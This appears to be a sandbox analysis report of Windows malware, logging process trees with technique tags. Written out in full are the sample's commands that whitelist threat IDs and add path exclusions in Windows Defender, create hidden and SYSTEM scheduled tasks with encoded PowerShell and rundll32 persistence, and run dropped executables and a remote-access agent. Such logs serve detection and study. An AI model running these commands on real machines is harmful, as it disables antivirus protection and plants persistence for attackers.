"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:6016

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:2868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:5220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:4516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:2684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3708

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:5272

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:5344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:5332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:5412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:6096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:1892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:5460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:5432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:3640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:5444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:5420

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:3900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:5416

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:5848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:5276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:5468

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:5592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:5664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:5572

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:5624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IMvaoGacGFPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IMvaoGacGFPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KworwGpsU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KworwGpsU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PiTBaswTmLRnC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PiTBaswTmLRnC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fqZXELUDteUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fqZXELUDteUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iWQNoaadPPPbqzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iWQNoaadPPPbqzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hcQaQMdhBGCZLFXRy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hcQaQMdhBGCZLFXRy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IFhjgRBUvFUNtHQy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IFhjgRBUvFUNtHQy\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Modifies data under HKEY_USERS
PID:1824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5524

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:6056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GoZliZaJcUpmPvyPwRR" /t REG_DWORD /d 0 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:1832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IMvaoGacGFPU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IMvaoGacGFPU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KworwGpsU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KworwGpsU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PiTBaswTmLRnC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PiTBaswTmLRnC" /t REG_DWORD /d 0 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:5284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fqZXELUDteUn" /t REG_DWORD /d 0 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:5280

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fqZXELUDteUn" /t REG_DWORD /d 0 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:5288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iWQNoaadPPPbqzVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:5328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iWQNoaadPPPbqzVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:5428

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:5424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5452

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1212

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:5628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hcQaQMdhBGCZLFXRy /t REG_DWORD /d 0 /reg:32
3⤵
PID:5568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hcQaQMdhBGCZLFXRy /t REG_DWORD /d 0 /reg:64
3⤵
- System Location Discovery: System Language Discovery
PID:5752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IFhjgRBUvFUNtHQy /t REG_DWORD /d 0 /reg:32
3⤵
- System Location Discovery: System Language Discovery
PID:5552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IFhjgRBUvFUNtHQy /t REG_DWORD /d 0 /reg:64
3⤵
PID:3124

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gjuRBXkes" /SC once /ST 01:13:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5640

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gjuRBXkes"
2⤵
PID:5996

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gjuRBXkes"
2⤵
PID:2792

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ECzxLUloJBwCJADCK" /SC once /ST 07:14:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IFhjgRBUvFUNtHQy\CKxyDMbPqQgFFAi\VMfZdiW.exe\" Wx /mYojdidzw 385121 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2960

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ECzxLUloJBwCJADCK"
2⤵
- System Location Discovery: System Language Discovery
PID:3548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1060
2⤵
- Program crash
PID:1340

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3300

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5252

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4756

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:1212

C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
2⤵
PID:1824

C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
2⤵
- System Location Discovery: System Language Discovery
PID:4140

C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
2⤵
PID:3652

C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
2⤵
PID:5860

C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
2⤵
- System Location Discovery: System Language Discovery
PID:4888

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3256

C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
2⤵
PID:5556

C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
2⤵
PID:5536

C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
2⤵
- System Location Discovery: System Language Discovery
PID:5996

C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
2⤵
- System Location Discovery: System Language Discovery
PID:4684

C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
2⤵
- System Location Discovery: System Language Discovery
PID:5900

C:\Windows\Temp\IFhjgRBUvFUNtHQy\CKxyDMbPqQgFFAi\VMfZdiW.exe
C:\Windows\Temp\IFhjgRBUvFUNtHQy\CKxyDMbPqQgFFAi\VMfZdiW.exe Wx /mYojdidzw 385121 /S
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:3628

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
- Indirect Command Execution
PID:728

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:4240

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:3948

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4564

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:3312

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:1464

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
- Indirect Command Execution
PID:5216

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:4212

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2656

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
- Indirect Command Execution
PID:2360

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:5744

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:3420

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
- Indirect Command Execution
PID:4948

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
- System Location Discovery: System Language Discovery
PID:5888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:4708

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:3600

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bMRcrYTbxyvtsWXpEp"
2⤵
PID:5200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
2⤵
PID:5352

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
3⤵
- Indirect Command Execution
PID:5444

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
4⤵
PID:5968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5928

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KworwGpsU\wUzxXa.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MffudHGbAqrriNn" /V1 /F
2⤵
- Scheduled Task/Job: Scheduled Task
PID:5368

